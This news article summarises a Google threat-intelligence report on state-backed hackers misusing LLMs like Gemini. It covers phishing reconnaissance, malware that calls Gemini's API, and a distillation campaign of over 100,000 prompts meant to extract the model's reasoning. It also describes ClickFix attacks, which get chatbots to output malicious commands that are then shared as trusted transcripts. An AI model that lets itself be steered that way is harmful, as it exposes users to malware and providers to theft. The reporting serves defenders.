Google: State-Sponsored Hackers Leverage AI in Cyberattacks

State-sponsored hackers are increasingly leveraging artificial intelligence to enhance their cyberattack capabilities, according to a new report from Google’s Threat Intelligence Group (GTIG). Threat actors from Iran, North Korea, China, and Russia are reportedly weaponizing large language models (LLMs), including Google’s Gemini, to craft more sophisticated phishing campaigns and accelerate malware development.

The Q4 2025 AI Threat Tracker report highlights how government-backed attackers have integrated AI across the entire attack lifecycle, realizing significant productivity gains in areas such as reconnaissance, social engineering, and malware creation. “For government-backed threat actors, large language models have become essential tools for technical research, targeting, and the rapid generation of nuanced phishing lures,” the GTIG researchers stated.

**AI-Driven Reconnaissance Targets Defense Sector**

Iranian threat actor APT42 has been observed using Gemini to augment its reconnaissance efforts and conduct targeted social engineering. The group reportedly employed the AI model to identify official email addresses for specific entities and to research potential targets, enabling them to create more credible pretexts for initial contact. By inputting a target’s biographical information into Gemini, APT42 could generate tailored personas and scenarios designed to elicit engagement. The AI’s translation capabilities also assisted the group in overcoming language barriers, helping them to bypass traditional phishing indicators like poor grammar or awkward syntax.

Similarly, North Korean government-backed actor UNC2970, which focuses on defense sector targets and impersonating corporate recruiters, has utilized Gemini to synthesize open-source intelligence and profile high-value targets. Their reconnaissance activities included searching for information on major cybersecurity and defense companies, identifying specific technical job roles, and gathering salary benchmarks. This sophisticated approach blurs the lines between legitimate professional research and malicious intelligence gathering, providing attackers with the necessary components to construct highly convincing phishing personas.

**Surge in Model Extraction Attacks**

Beyond direct operational misuse, Google DeepMind and GTIG have identified a notable increase in “model extraction” or “distillation attacks.” These attacks aim to steal intellectual property by replicating the functionality and knowledge base of AI models. One campaign specifically targeting Gemini’s reasoning capabilities involved submitting over 100,000 prompts with the objective of coercing the model into revealing its full reasoning processes. The extensive nature of these queries suggests an attempt to replicate Gemini’s decision-making abilities in various tasks and across different non-English languages.

While GTIG has not yet observed direct attacks on frontier models by advanced persistent threat (APT) actors, they have detected and disrupted frequent model extraction attempts originating from private sector entities and researchers globally, all seeking to clone proprietary AI logic. Google’s security systems reportedly identified these attacks in real-time and deployed defenses to safeguard internal reasoning traces.

**Emergence of AI-Integrated Malware**

The GTIG report also details the emergence of malware samples, tracked as HONESTCUE, that leverage Gemini’s API to outsource functionality generation. This malware employs a multi-layered obfuscation strategy designed to evade traditional network-based detection and static analysis. HONESTCUE operates as a downloader and launcher framework, sending prompts to Gemini’s API and receiving C# source code as responses. The subsequent payloads are compiled and executed directly in memory, leaving minimal to no forensic artifacts on disk.

In a separate development, GTIG identified COINBAIT, a phishing kit whose development appears to have been significantly accelerated by AI code generation tools. This kit, designed to impersonate a major cryptocurrency exchange to harvest credentials, was reportedly built using the AI-powered platform Lovable AI.

**ClickFix Campaigns Exploit AI Chat Platforms**

A novel social engineering campaign, first observed in late 2025, involves threat actors abusing the public sharing features of generative AI services like Gemini, ChatGPT, Copilot, DeepSeek, and Grok. Attackers have manipulated these AI models to generate seemingly legitimate instructions for common computer tasks, embedding malicious command-line scripts within the provided “solutions.” By sharing links to these AI chat transcripts, threat actors can leverage trusted domains to host the initial stages of their attacks, distributing ATOMIC malware targeting macOS systems. This three-stage ClickFix attack chain cleverly exploits the trust associated with AI-generated content.

**Underground Marketplaces Thrive on Stolen API Keys**

Analysis of English and Russian-language underground forums reveals a persistent demand for AI-enabled tools and services within the cybercriminal ecosystem. However, state-sponsored hackers and other malicious actors often face challenges in developing bespoke AI models. Consequently, they frequently resort to utilizing mature commercial AI products, accessing them through compromised API keys. One such toolkit, “Xanthorox,” advertised as a custom AI for autonomous malware generation and phishing campaign development, was found by GTIG to be powered by several commercial AI products, including Gemini, accessed via stolen API keys, rather than being a truly bespoke creation.

**Google’s Response and Mitigation Efforts**

In response to these evolving threats, Google has taken action against identified threat actors by disabling accounts and assets associated with malicious activity. The company is also continuously enhancing its AI models and classifiers to better identify and refuse requests that could facilitate malicious attacks. “We are committed to developing AI boldly and responsibly, which means taking proactive steps to disrupt malicious activity by disabling the projects and accounts associated with bad actors, while continuously improving our models to make them less susceptible to misuse,” the report stated.

Despite these advancements in AI-powered cyberattacks, GTIG emphasizes that no APT or information operations actors have yet achieved breakthrough capabilities that fundamentally alter the overall threat landscape. The findings underscore the critical and rapidly evolving role of AI in cybersecurity, as both defenders and attackers race to harness the technology’s capabilities. For enterprise security teams, particularly those in regions where state-sponsored cyber activity remains high, the report serves as a crucial reminder to bolster defenses against AI-augmented social engineering and reconnaissance operations.